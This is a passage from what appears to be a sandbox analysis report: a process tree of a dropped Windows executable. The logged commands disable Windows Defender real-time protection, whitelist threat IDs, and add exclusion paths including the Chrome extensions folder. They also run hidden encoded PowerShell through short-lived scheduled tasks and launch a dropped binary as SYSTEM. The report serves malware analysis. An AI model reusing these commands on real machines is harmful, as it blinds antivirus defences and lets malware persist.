  C:\Users\Admin\AppData\Local\Temp\rfFVivUZKcJgFUPWP\NsjMhDBpUOGfSxc\jENuTVV.exe xW /FBtdidaqCG 525403 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2032
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:2024
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      4⤵
      PID:2812
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:2824
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        6⤵
        
        PID:2820
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      4⤵
      PID:2816
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:2808
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        6⤵
        
        PID:2692
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      4⤵
      PID:1132
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:1848
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        6⤵
        
        PID:2004
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      4⤵
      PID:2020
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:1964
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        6⤵
        
        PID:3060
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      4⤵
      PID:2232
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        
        PID:1904
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1912
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        7⤵
        
        PID:484
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gpuKHDQnP" /SC once /ST 14:39:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2584
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gpuKHDQnP"
    3⤵
    PID:2668
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gpuKHDQnP"
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:1572
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:400
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:564
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2916
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gfJGedlNz" /SC once /ST 15:15:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:3048
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gfJGedlNz"
    3⤵
    PID:2740
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gfJGedlNz"
    3⤵
    PID:2880
- - C:\Windows\SysWOW64\forfiles.exe
    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
    3⤵
    PID:2492
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
      4⤵
      PID:2548
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2560
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1948
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KnZelsPPFGMRyKDX" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1036
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KnZelsPPFGMRyKDX" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1488
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KnZelsPPFGMRyKDX" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1568
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KnZelsPPFGMRyKDX" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1712
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KnZelsPPFGMRyKDX" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1564
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KnZelsPPFGMRyKDX" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2440
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KnZelsPPFGMRyKDX" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2588
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KnZelsPPFGMRyKDX" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:760
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\KnZelsPPFGMRyKDX\swEbrcda\kfclOMQEYZkYHZKV.wsf"
    3⤵
    PID:2088
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\KnZelsPPFGMRyKDX\swEbrcda\kfclOMQEYZkYHZKV.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:2312
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HBmACejevtsxTSigFeR" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1720
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HBmACejevtsxTSigFeR" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1180
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gMilQfTdIRUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2824
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gMilQfTdIRUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2764
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icUgDvQSU" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:3060
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icUgDvQSU" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1508
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qjFPOYfeHIOU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:668
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qjFPOYfeHIOU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1888
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sglvIZRdDeVLC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2132
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sglvIZRdDeVLC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2384
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\bCkljnrIeSZuVzVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2780
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\bCkljnrIeSZuVzVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:804
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1736
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:3008
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\rfFVivUZKcJgFUPWP" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1144
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\rfFVivUZKcJgFUPWP" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1480
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KnZelsPPFGMRyKDX" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1292
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KnZelsPPFGMRyKDX" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1552
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HBmACejevtsxTSigFeR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1496
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HBmACejevtsxTSigFeR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:680
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gMilQfTdIRUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2928
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gMilQfTdIRUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1516
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icUgDvQSU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2112
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icUgDvQSU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1264
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qjFPOYfeHIOU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:776
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qjFPOYfeHIOU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2840
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sglvIZRdDeVLC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1360
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sglvIZRdDeVLC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2240
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\bCkljnrIeSZuVzVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1528
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\bCkljnrIeSZuVzVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1532
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2204
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1748
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\rfFVivUZKcJgFUPWP" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1852
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\rfFVivUZKcJgFUPWP" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2468
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KnZelsPPFGMRyKDX" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1924
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KnZelsPPFGMRyKDX" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2600
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gZudURTvn" /SC once /ST 21:28:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2576
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gZudURTvn"
    3⤵
    PID:864
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gZudURTvn"
    3⤵
    PID:1184
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    3⤵
    PID:2820
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
      4⤵
      PID:2808
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    3⤵
    PID:2812
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
      4⤵
      PID:2216
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "JDurvOeXJCAPiYSiE" /SC once /ST 03:49:07 /RU "SYSTEM" /TR "\"C:\Windows\Temp\KnZelsPPFGMRyKDX\MUMmHjOwEPhutcD\jWyLcvd.exe\" b7 /iOMNdidsy 525403 /S" /V1 /F
    3⤵
    - Creates scheduled task(s)
    PID:1968
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "JDurvOeXJCAPiYSiE"
    3⤵
    PID:2020
- C:\Windows\Temp\KnZelsPPFGMRyKDX\MUMmHjOwEPhutcD\jWyLcvd.exe
  C:\Windows\Temp\KnZelsPPFGMRyKDX\MUMmHjOwEPhutcD\jWyLcvd.exe b7 /iOMNdidsy 525403 /S
  2⤵
  PID:2924
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:536
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      4⤵
      PID:1912
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:2776
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        6⤵
        
        PID:1888
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      4⤵
      PID:2024
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:1896
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        6⤵
        
        PID:1408
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      4⤵
      PID:1476
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:2860
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        6⤵
        
        PID:1828
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      4⤵
      PID:2384
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:1660
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        6⤵
        
        PID:1128
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      4⤵
      PID:1772
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        
        PID:2584
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2116
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        7⤵
        
        PID:1640
